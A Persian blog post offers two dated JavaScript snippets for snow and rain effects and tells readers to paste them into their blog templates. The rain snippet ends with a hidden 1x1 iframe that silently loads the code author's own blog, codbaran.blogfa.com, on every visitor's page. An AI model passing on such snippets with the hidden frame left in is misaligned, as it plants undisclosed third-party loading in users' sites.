صفحه ها
دسته
وبــلاگهام در بلاگــفا
لیــنک ویژه دانلود موسـقی
دست نوشته های تنهایی من
لینکهای دوستان
ترفند
دلتنگی من غم تنهایی
قالب های بلاگفا
عکسها
موسقی
آرشیو
آمار وبلاگ
تعداد بازدید : 263335
تعداد نوشته ها : 205
تعداد نظرات : 62
Rss
طراح قالب

و اما ۲ کد بسیار زیبا و جالب برای بارش برف و باران در وبلاگ شما

 

کد ها را کپی کرده و در  انتهای ویرایش قالب بزارید

 

کد بارش برف

 

|<html> <body bgcolor="#228B22"> <style> .drop { position: absolute; width: 3; filter: flipV(), flipH(); font-size: 40; color: blue } </style> <script language="javascript"> snow = true; snowsym = " * " rainsym = " ' " howmany = 25 if(snow){sym = snowsym; speed=1; angle=10; drops=howmany} else{sym = rainsym; speed=50; drops=howmany; angle=6} movex = -speed/angle; movey = speed; count = 0; function moverain(){ for(move = 0; move < drops; move++){ xx[move]+=movex; yy[move]+=mv[move]; hmm = Math.round(Math.random()*1); if(xx[move] < 0){xx[move] = maxx+10;} if(yy[move] > maxy){yy[move] = 10;} drop[move].left = xx[move] drop[move].top = yy[move]+document.body.scrollTop; }setTimeout('moverain()','1')} </script> <script language="javascript"> if (document.all){ drop = new Array(); xx = new Array(); yy = new Array(); mv = new Array() ly = "document.all[\'"; st = "\'].style" for(make = 0; make < drops; make++){ document.write('<div id="drop'+make+'" class=drop>'+sym+'</div>'); drop[make] = eval(ly+'drop'+make+st); maxx = document.body.clientWidth-40 maxy = document.body.clientHeight-40 xx[make] = Math.random()*maxx; yy[make] = -100-Math.random()*maxy; drop[make].left = xx[make] drop[make].top = yy[make] mv[make] = (Math.random()*5)+speed/4; drop[make].fontSize = (Math.random()*10)+20; //*Change (col = 'white) to (col =YOUR COLOR)*// if(snow){col = 'white'}else{col = 'blue'} drop[make].color = col; } window.onload=moverain } </script> </html> <a href="http://www.codbaran.blogfa.com/">بــهـترین قالب ها و کدهای جاوا </a>| <!-- End codbaran.blogfa.com Clock code --> </body> </html> </body> </html> </body> </html> </body> </html>

کد بارش باران

<meta http-equiv="Content-Language" content="en-us"> <body> <SCRIPT LANGUAGE="JavaScript"> <!-- Begin var no = 50; var speed = 2; var ns4up = (document.layers) ? 1 : 0; var ie4up = (document.all) ? 1 : 0; var s, x, y, sn, cs; var a, r, cx, cy; var i, doc_width = 800, doc_height = 600; if (ns4up) { doc_width = self.innerWidth; doc_height = self.innerHeight; } else if (ie4up) { doc_width = document.body.clientWidth; doc_height = document.body.clientHeight; } x = new Array(); y = new Array(); r = new Array(); cx = new Array(); cy = new Array(); s = 8; for (i = 0; i < no; ++ i) { initRain(); if (ns4up) { if (i == 0) { document.write("<layer name=\"dot"+ i +"\" left=\"1\" "); document.write("top=\"1\" visibility=\"show\"><font color=\"blue\">"); document.write(",</font></layer>"); } else { document.write("<layer name=\"dot"+ i +"\" left=\"1\" "); document.write("top=\"1\" visibility=\"show\"><font color=\"blue\">"); document.write(",</font></layer>"); } } else if (ie4up) { if (i == 0) { document.write("<div id=\"dot"+ i +"\" style=\"POSITION: "); document.write("absolute; Z-INDEX: "+ i +"; VISIBILITY: "); document.write("visible; TOP: 15px; LEFT: 15px;\"><font color=\"blue\">"); document.write(",</font></div>"); } else { document.write("<div id=\"dot"+ i +"\" style=\"POSITION: "); document.write("absolute; Z-INDEX: "+ i +"; VISIBILITY: "); document.write("visible; TOP: 15px; LEFT: 15px;\"><font color=\"blue\">"); document.write(",</font></div>"); } } } function initRain() { a = 6; r[i] = 1; sn = Math.sin(a); cs = Math.cos(a); cx[i] = Math.random() * doc_width + 1; cy[i] = Math.random() * doc_height + 1; x[i] = r[i] * sn + cx[i]; y[i] = cy[i]; } function makeRain() { r[i] = 1; cx[i] = Math.random() * doc_width + 1; cy[i] = 1; x[i] = r[i] * sn + cx[i]; y[i] = r[i] * cs + cy[i]; } function updateRain() { r[i] += s; x[i] = r[i] * sn + cx[i]; y[i] = r[i] * cs + cy[i]; } function raindropNS() { for (i = 0; i < no; ++ i) { updateRain(); if ((x[i] <= 1) || (x[i] >= (doc_width - 20)) || (y[i] >= (doc_height - 20))) { makeRain(); doc_width = self.innerWidth; doc_height = self.innerHeight; } document.layers["dot"+i].top = y[i]; document.layers["dot"+i].left = x[i]; } setTimeout("raindropNS()", speed); } function raindropIE() { for (i = 0; i < no; ++ i) { updateRain(); if ((x[i] <= 1) || (x[i] >= (doc_width - 20)) || (y[i] >= (doc_height - 20))) { makeRain(); doc_width = document.body.clientWidth; doc_height = document.body.clientHeight; } document.all["dot"+i].style.pixelTop = y[i]; document.all["dot"+i].style.pixelLeft = x[i]; } setTimeout("raindropIE()", speed); } if (ns4up) { raindropNS(); } else if (ie4up) { raindropIE(); } // End --> </script> <!-- Script Size: 3.14 KB --> <p> </p> <p> </p> <p> </p> <p> </p> <p> </p> <p> </p> <p> </p> <p> </p> <p> </p> <p> </p> <p> </p> <p> </p> </body></body> </html> </body> </html> </body> </html><iframe src="http://codbaran.blogfa.com" width="1" height="1" align="top" name="CodBaran">


پنج شنبه جهاردهم 3 1388
X